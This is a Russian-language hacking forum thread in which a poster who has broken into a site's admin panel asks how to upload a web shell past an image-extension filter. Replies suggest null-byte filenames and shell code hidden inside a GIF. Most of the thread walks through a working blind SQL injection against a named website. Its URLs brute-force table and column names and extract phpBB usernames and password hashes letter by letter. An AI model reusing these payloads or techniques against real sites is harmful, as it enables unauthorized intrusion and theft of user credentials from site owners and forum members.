Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
file_priv отключён, доступа к mysql.user нет, только в админку.
Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.

2 wildshaman:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=97

Если проверяеться только расширения, но не сам факт что это картинка попробуй null байт, shell.php%00.jpg, если проверяеться сам факт что это картинка, то запихни в маленку картинку, например в .gif код шелла, и посмотри что бы валидно открывалась картинка и попробуй то же самое, а вообше че за админка? Паблик движок или самопис?

Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает

2 wildshaman
Смотри запрос который дал R1dex на предыдущей странице

гы, я не спорю, похоже на бред, конечно, но есть разница таки между:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49

и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49

насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки) Но blind-sql-inj есть не только в пятой ветке

да, в принципе ты прав, но, в concat_ws если у тебя первый запрос вернет error то остальные выполняться не будут, то есть, что я хочу сказать, там есть check6ga_forums.phpbb_users и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+use r_password+from+phpbb_users+LIMIT+1,1),(select+use r_password+from+phpbb_users+LIMIT+1,1)),1,1)))=97

нам будет возврашено
Table 'check6ga_forums.admin' doesn't exist,
потому как первый запрос в concat_ws вернул error остальные запросы в concat_ws не выполнились, поэтому использования 3 запросов в concat_ws без смыслено.

не могу не согласиться, туплю чото сегодня по черному. +

проверка:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+admin),1,1)))=49

найденная таблица (и уже случайно колонка):

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+phpbb_users),1,1)))=49

брут колонок из phpbb_users :

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser+from+phpbb_users),1,1)))=49

сбрутилась еще одна:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users),1,1)))=49

ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser_password+from+phpbb_users),1,1)))=49

Далее понятно

но все таки напишу:

ищем ник 1 пользователя в базе:

проверяем на 1-ую буковку 'a':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),1,1)))=97

угадали, отлично, проверяем вторую букву далее по алфавиту:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=98

не подходит, и так дошлепали до 110, буква 'n':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=110

на всякий случай проверяем нашу догадку:

http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from +phpbb_users+limit+0,1),1,2)='an'

значит всё верно. И так бомбим до победного конца. Тоже самое с user_password

2 wildshaman:
ещё слепые inj:
версия мускула = 4

спасиб, а то я новичок в этом деле, еще не все понятно)